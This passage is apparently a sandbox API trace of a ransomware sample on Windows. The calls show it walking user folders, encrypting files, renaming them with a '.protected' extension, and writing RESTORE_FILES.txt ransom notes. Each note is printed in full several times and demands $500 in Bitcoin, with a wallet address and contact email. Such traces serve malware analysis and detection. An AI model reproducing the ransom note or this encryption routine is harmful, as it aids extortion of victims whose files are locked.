nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x49f458*, lpNumberOfBytesRead=0x295ea24*=0x49c, lpOverlapped=0x0) returned 1 [0077.880] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0xfffffb64, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0077.880] WriteFile (in: hFile=0x14c, lpBuffer=0x49f458*, nNumberOfBytesToWrite=0x49c, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x49f458*, lpNumberOfBytesWritten=0x295ea24*=0x49c, lpOverlapped=0x0) returned 1 [0077.881] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.882] WriteFile (in: hFile=0x14c, lpBuffer=0x295e9fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x295e9fc*, lpNumberOfBytesWritten=0x295ea24*=0x4, lpOverlapped=0x0) returned 1 [0077.882] WriteFile (in: hFile=0x14c, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ea24*=0x30, lpOverlapped=0x0) returned 1 [0077.882] CloseHandle (hObject=0x14c) returned 1 [0077.882] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Color\\ACECache11.lst.protected") returned 84 [0077.882] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Color\\ACECache11.lst" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\adobe\\color\\acecache11.lst"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Color\\ACECache11.lst.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\adobe\\color\\acecache11.lst.protected")) returned 1 [0077.883] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0077.885] lstrcmpiW (lpString1="Profiles", lpString2="Windows") returned -1 [0077.885] lstrcmpiW (lpString1="Profiles", lpString2="Program Files") returned -1 [0077.885] lstrcmpiW (lpString1="Profiles", lpString2="Program Files (x86)") returned -1 [0077.885] lstrcmpiW (lpString1="Profiles", lpString2="$Recycle.bin") returned 1 [0077.885] lstrcmpiW (lpString1="Profiles", lpString2="System Volume Information") returned -1 [0077.885] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Color\\Profiles") returned 68 [0077.885] lstrcmpW (lpString1="Profiles", lpString2=".") returned 1 [0077.885] lstrcmpW (lpString1="Profiles", lpString2="..") returned 1 [0077.885] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Color\\Profiles\\*") returned 70 [0077.885] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Color\\Profiles\\*", lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0x47ba90 [0077.886] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0077.886] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0077.886] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0077.886] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0077.886] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0077.886] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Color\\Profiles\\.") returned 70 [0077.886] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0077.886] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0077.886] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0077.886] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0077.886] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0077.886] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0077.886] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0077.886] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Color\\Profiles\\..") returned 71 [0077.886] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0077.886] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0077.886] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0077.886] lstrcmpiW (lpString1="wscRGB.icc", lpString2="Windows") returned 1 [0077.886] lstrcmpiW (lpString1="wscRGB.icc", lpString2="Program Files") returned 1 [0077.886] lstrcmpiW (lpString1="wscRGB.icc", lpString2="Program Files (x86)") returned 1 [0077.886] lstrcmpiW (lpString1="wscRGB.icc", lpString2="$Recycle.bin") returned 1 [0077.886] lstrcmpiW (lpString1="wscRGB.icc", lpString2="System Volume Information") returned 1 [0077.886] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Color\\Profiles\\wscRGB.icc") returned 79 [0077.886] StrStrIW (lpFirst="wscRGB.icc", lpSrch=".protected") returned 0x0 [0077.886] lstrcmpW (lpString1="wscRGB.icc", lpString2="RESTORE_FILES.txt") returned 1 [0077.886] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0077.887] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0077.887] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Color\\Profiles\\wscRGB.icc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\adobe\\color\\profiles\\wscrgb.icc"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0077.887] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Color\\Profiles\\wscRGB.icc") returned 79 [0077.887] StrStrW (lpFirst="wscRGB.icc", lpSrch=".txt") returned 0x0 [0077.887] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Color\\Profiles\\wscRGB.icc") returned 79 [0077.887] StrStrW (lpFirst="wscRGB.icc", lpSrch=".rar") returned 0x0 [0077.887] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Color\\Profiles\\wscRGB.icc") returned 79 [0077.887] StrStrW (lpFirst="wscRGB.icc", lpSrch=".zip") returned 0x0 [0077.887] ReadFile (in: hFile=0x150, lpBuffer=0x49f458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x49f458*, lpNumberOfBytesRead=0x295e7b4*=0x2800, lpOverlapped=0x0) returned 1 [0077.941] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0077.941] WriteFile (in: hFile=0x150, lpBuffer=0x49f458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x49f458*, lpNumberOfBytesWritten=0x295e7b4*=0x2800, lpOverlapped=0x0) returned 1 [0077.941] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.941] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0077.942] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0077.942] CloseHandle (hObject=0x150) returned 1 [0077.942] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Color\\Profiles\\wscRGB.icc.protected") returned 89 [0077.942] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Color\\Profiles\\wscRGB.icc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\adobe\\color\\profiles\\wscrgb.icc"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Color\\Profiles\\wscRGB.icc.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\adobe\\color\\profiles\\wscrgb.icc.protected")) returned 1 [0077.943] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0077.943] lstrcmpiW (lpString1="wsRGB.icc", lpString2="Windows") returned 1 [0077.943] lstrcmpiW (lpString1="wsRGB.icc", lpString2="Program Files") returned 1 [0077.943] lstrcmpiW (lpString1="wsRGB.icc", lpString2="Program Files (x86)") returned 1 [0077.943] lstrcmpiW (lpString1="wsRGB.icc", lpString2="$Recycle.bin") returned 1 [0077.943] lstrcmpiW (lpString1="wsRGB.icc", lpString2="System Volume Information") returned 1 [0077.943] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Color\\Profiles\\wsRGB.icc") returned 78 [0077.943] StrStrIW (lpFirst="wsRGB.icc", lpSrch=".protected") returned 0x0 [0077.943] lstrcmpW (lpString1="wsRGB.icc", lpString2="RESTORE_FILES.txt") returned 1 [0077.943] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0077.943] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0077.943] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Color\\Profiles\\wsRGB.icc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\adobe\\color\\profiles\\wsrgb.icc"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0077.944] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Color\\Profiles\\wsRGB.icc") returned 78 [0077.944] StrStrW (lpFirst="wsRGB.icc", lpSrch=".txt") returned 0x0 [0077.944] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Color\\Profiles\\wsRGB.icc") returned 78 [0077.944] StrStrW (lpFirst="wsRGB.icc", lpSrch=".rar") returned 0x0 [0077.944] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Color\\Profiles\\wsRGB.icc") returned 78 [0077.944] StrStrW (lpFirst="wsRGB.icc", lpSrch=".zip") returned 0x0 [0077.946] ReadFile (in: hFile=0x150, lpBuffer=0x49f458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x49f458*, lpNumberOfBytesRead=0x295e7b4*=0xa74, lpOverlapped=0x0) returned 1 [0078.015] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffff58c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.015] WriteFile (in: hFile=0x150, lpBuffer=0x49f458*, nNumberOfBytesToWrite=0xa74, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x49f458*, lpNumberOfBytesWritten=0x295e7b4*=0xa74, lpOverlapped=0x0) returned 1 [0078.016] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.016] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0078.016] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0078.016] CloseHandle (hObject=0x150) returned 1 [0078.016] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Color\\Profiles\\wsRGB.icc.protected") returned 88 [0078.016] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Color\\Profiles\\wsRGB.icc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\adobe\\color\\profiles\\wsrgb.icc"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Color\\Profiles\\wsRGB.icc.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\adobe\\color\\profiles\\wsrgb.icc.protected")) returned 1 [0078.017] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0 [0078.017] FindClose (in: hFindFile=0x47ba90 | out: hFindFile=0x47ba90) returned 1 [0078.017] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Color\\Profiles\\RESTORE_FILES.txt") returned 86 [0078.017] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Color\\Profiles\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\adobe\\color\\profiles\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0078.041] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0078.041] WriteFile (in: hFile=0x14c, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e7b4*=0x53d, lpOverlapped=0x0) returned 1 [0078.042] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0078.042] WriteFile (in: hFile=0x14c, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e7b4*=0x2ac, lpOverlapped=0x0) returned 1 [0078.042] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0078.042] WriteFile (in: hFile=0x14c, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e7b4*=0xb1, lpOverlapped=0x0) returned 1 [0078.042] CloseHandle (hObject=0x14c) returned 1 [0078.042] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0078.042] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0078.042] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Color\\RESTORE_FILES.txt") returned 77 [0078.042] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Color\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\adobe\\color\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0078.043] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0078.043] WriteFile (in: hFile=0xd8, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ea24*=0x53d, lpOverlapped=0x0) returned 1 [0078.043] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0078.043] WriteFile (in: hFile=0xd8, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ea24*=0x2ac, lpOverlapped=0x0) returned 1 [0078.043] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0078.044] WriteFile (in: hFile=0xd8, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ea24*=0xb1, lpOverlapped=0x0) returned 1 [0078.044] CloseHandle (hObject=0xd8) returned 1 [0078.045] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0 [0078.045] FindClose (in: hFindFile=0x47ba10 | out: hFindFile=0x47ba10) returned 1 [0078.045] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\RESTORE_FILES.txt") returned 71 [0078.045] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\adobe\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0078.046] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0078.046] WriteFile (in: hFile=0xd4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ec94*=0x53d, lpOverlapped=0x0) returned 1 [0078.046] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0078.046] WriteFile (in: hFile=0xd4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ec94*=0x2ac, lpOverlapped=0x0) returned 1 [0078.046] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0078.046] WriteFile (in: hFile=0xd4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ec94*=0xb1, 